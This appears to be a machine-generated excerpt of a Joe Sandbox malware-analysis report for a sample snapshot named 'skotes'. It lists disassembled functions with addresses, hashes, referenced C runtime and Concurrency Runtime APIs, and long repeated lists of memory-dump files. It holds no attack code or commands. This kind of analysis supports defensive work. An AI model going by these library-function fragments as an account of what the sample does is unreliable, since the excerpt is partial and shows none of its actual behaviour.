Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: S9+$csm
API String ID: 1170836740-565732053
Opcode ID: 366d5282f838acecca205af03d30532335068a2dfd526ead2f873242d2acf07b
Instruction ID: 1dc81319bb396ea79f7189b3a47797c6d88e04cb8136b4563b5a12fa7f4644c4
Opcode Fuzzy Hash: 366d5282f838acecca205af03d30532335068a2dfd526ead2f873242d2acf07b
Instruction Fuzzy Hash: 8B41E334A20619ABCF10EF28D884ADEBBB4AF05354F148155E8185B393D731AA25CF90

Function 002A7364 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 002A73B0
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 002A73F2
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 002A740E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 002A7419
std::invalid_argument::invalid_argument.LIBCONCRT ref: 002A7440

Strings

count, xrefs: 002A737E
ppVirtualProcessorRoots, xrefs: 002A7438

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3897347962-3650809737
Opcode ID: 6a3e4e1d1f029906fa7640a25a4db3d3bfd66e60059cbfb8177b0a14521ae045
Instruction ID: ee2a1d25a0378918378064999d6cc339403425c6fc9a4eb90adc22c10be72a01
Opcode Fuzzy Hash: 6a3e4e1d1f029906fa7640a25a4db3d3bfd66e60059cbfb8177b0a14521ae045
Instruction Fuzzy Hash: 40218234A20209AFCF10EF58D895AADBBB5FF0A340F1540A9E805A7351CF30AE24CF94

Function 0029EE5F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0029EEBC
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0029EEC8
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0029EEE1
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0029EF0F
Concurrency::Context::Block.LIBCONCRT ref: 0029EF31

Strings

i), xrefs: 0029EED0

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID: i)
API String ID: 1182035702-29836027
Opcode ID: c26cf17e60235847a25c5411c330bcfea5313f913675fa02bbc290565d440f90
Instruction ID: 4c81f8924ca6e53f4007fea73f99ce67eea79c6c4fdc91cb5d38361830e671b3
Opcode Fuzzy Hash: c26cf17e60235847a25c5411c330bcfea5313f913675fa02bbc290565d440f90
Instruction Fuzzy Hash: 5B218370C30216DADF28DFA4C4456EEB7F0BF15360F11092EE151A61D1EBB55A64CF51

Function 002A78E1 Relevance: 12.1, APIs: 8, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 002A7903

Part of subcall function 002A5CB8: __EH_prolog3_catch.LIBCMT ref: 002A5CBF
Part of subcall function 002A5CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 002A5CF8

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 002A792A
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 002A7936

Part of subcall function 002A5CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 002A5D70
Part of subcall function 002A5CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 002A5D7E

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 002A7982
Concurrency::location::_Assign.LIBCMT ref: 002A79A3
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 002A79AB
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 002A79BD
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 002A79ED

Part of subcall function 002A691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 002A6942
Part of subcall function 002A691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 002A6965

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
String ID:
API String ID: 1475861073-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: b6bd9e49c27609a54fc62a464c49542ba58ad78539bbae95e119c8c14308a043
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 0631E330B28257ABCF16AB784C927FFB7A59F47300F0401AAD585D7242DF244D6A8B95

Function 002C4C14 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 002C4C98
__alloca_probe_16.LIBCMT ref: 002C4D5E
__freea.LIBCMT ref: 002C4DCA

Part of subcall function 002BB04B: RtlAllocateHeap.NTDLL(00000000,3C8350B4,?,?,0029D3FC,3C8350B4,?,00297A8B,?,?,?,?,?,?,00287465,?), ref: 002BB07E

__freea.LIBCMT ref: 002C4DD3
__freea.LIBCMT ref: 002C4DF6

Strings

Z+,m+, xrefs: 002C4C26

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID: Z+,m+
API String ID: 1423051803-1835856013
Opcode ID: 5689fc75ef7ab24e91eb5df5f329972fb7823cc2afbb81d096e8264addd61df1
Instruction ID: 41a823e77d68abdfb22972403a3a3f89bf60e7bb639d3c6de0809827b0bd9903
Opcode Fuzzy Hash: 5689fc75ef7ab24e91eb5df5f329972fb7823cc2afbb81d096e8264addd61df1
Instruction Fuzzy Hash: 9551E172620206ABEB21BE64DC51FBB3BA9DF85750F15032DFD05A7150EB70DD308AA0

Function 002ADD18 Relevance: 10.6, APIs: 7, Instructions: 117threadCOMMON

Download Yara Rule

APIs

Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 002ADD91
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 002ADDAE
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 002ADE14
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 002ADE29
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 002ADE3B
Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 002ADE4B
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 002ADE74

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
String ID:
API String ID: 2885714658-0
Opcode ID: fc4a11d0075c7926d0ce5225adfe0abe954a9b7872f1bbafa7835fcff6bfc1c7
Instruction ID: 1f25ba70d03def4d524c032062392c934e834a5a28114b8c0fc25c6e181be8cb
Opcode Fuzzy Hash: fc4a11d0075c7926d0ce5225adfe0abe954a9b7872f1bbafa7835fcff6bfc1c7
Instruction Fuzzy Hash: 7741A920A342459BCF19EFB086557AC7BA16F12304F1444A9E9426B6D3CF648E29CF62

Function 002AE7AF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

